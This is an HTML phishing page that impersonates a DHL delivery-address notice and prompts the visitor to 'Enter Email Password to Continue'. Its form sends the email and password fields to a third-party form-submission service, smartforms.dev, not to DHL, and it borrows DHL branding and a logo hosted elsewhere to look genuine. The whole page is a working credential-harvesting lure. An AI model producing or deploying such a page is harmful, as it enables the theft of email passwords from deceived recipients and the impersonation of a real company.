<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>DHL Delivery Address</title>
<meta charset="utf-8" />
<link rel="icon" href="https://fonts.googleapis.com/css?family=Montserrat:100,200,300,400,500,600,700,800" rel="stylesheet">


<style>
body, html {
  height: 100%;
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

.bg-image {
  /* The image used */
  background-image: url("https://www.ax4.com/ax4/pix/loginPage/business/backgrounds/2012421/bg.jpg");
  
  /* Add the blur effect */
  filter: blur(0px);
  -webkit-filter: blur(0px);
  
  /* Full height */
  height: 100%; 
  
  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

/* Position text in the middle of the page/image */
.bg-text {
  background-color: rgb(225 179 25); /* Fallback color */
  background-color: rgba(rgba(211, 0, 28, 0.84)); /* Black w/opacity/see-through */
  color: white;
  font-weight: bold;
  border: 1px solid #0FFFFFF;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  border-radius: 10px 30px;
  z-index: 2;
  width: 400px;
  height: 320px;
  padding: 20px;
  text-align: center;
  -webkit-box-shadow: 5px 5px 7px 4px rgba(0,0,0,0.71); 
  box-shadow: 5px 5px 7px 4px rgba(0,0,0,0.71);
}
</style>
</head>
<body>

<div class="bg-image"></div>

<div class="bg-text">

 <table align="center" style="width:340px;" cellspacing="0">
 
 <tr><td style="height:15px;"></td></tr>
 
 <tr><td>
 
  <font style="font-family: Arial, Helvetica, sans-serif;" size="4" color="#bc0409">
  DHL Contact Address
  </font>
  
  
  <br>
  
  <font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#bc0409">
  Enter Email Password to Continue
  </font>
 
 </td></tr>
 
 
 <tr><td style="height:15px;">
 
  <form method="post" action="https://smartforms.dev/submit/64a38d4c0dd8ac0a53209ce7">
 
 </td></tr>
 
 
 <tr><td>
 
  
   <div align="center">
   
    <input type="email" name="login" 
    style="width:320px; height:40px; border:1px solid #BDB7AB; padding:10px; border-radius: 2px; background:#FFF; font: #000" required="" 
    value="" disabled>
   
   </div>
 
 
 </td></tr>
 
     
 <tr><td style="height:7px;"></td></tr>
     
 <tr><td>
     
   <div align="center">
   
    <input type="password" name="passwd" 
    style="width:320px; height:40px; border:1px solid #BDB7AB; padding:10px; border-radius: 2px; background:#FFF; font: #000" required="" 
    placeholder="Password">
   
   </div>
     
 </td></tr>
 
 
 
 <tr><td style="height:8px;"></td></tr>
     
     
     
     
 <tr><td>
     
   <div align="center">
     
     <button type="submit" value="Submit" 
     style="width:320px; height:40px; border:1px solid #084B8A; padding:10px; border-radius: 4px; background:#bc0409; font: #FFF">
      
      <font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#FFFFFF">
      Click to view Details
      </font>
      
     </button>
       
   </div>
     
 </td></tr>
 
 
 
 <tr><td style="height:15px;">
 
 
  <input type="hidden" name="login" value="">
  
  </form>
 
 
 </td></tr>
 
 
 
 
 
 <tr><td>
 
   <table style="width:320px;" align="center" cellspacing="0"><tr>
   
   <td>
   
    <img src="https://www.patrickmaulion.com/images/LogoMotion/15-DHL.gif" style="width:50px; height:37px;">
   
   </td>
   
   
   <td style="width:10px;"></td>
   
   
   
   <td style="width:255px;">
   
    <div align="left">
   
     <font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#bc0409">
     
       2023  Excellence. Simply Delivered     
      <br>
      
      <font color="gold"><b></b></font>
     
     </font>
     
    </div>
   
   </td>
   
   </tr></table>
 
 </td></tr>
 
 
 
 
 
 
 <tr><td style="height:15px;"></td></tr>
 
 </table>
 
  
</div>

</body>
</html>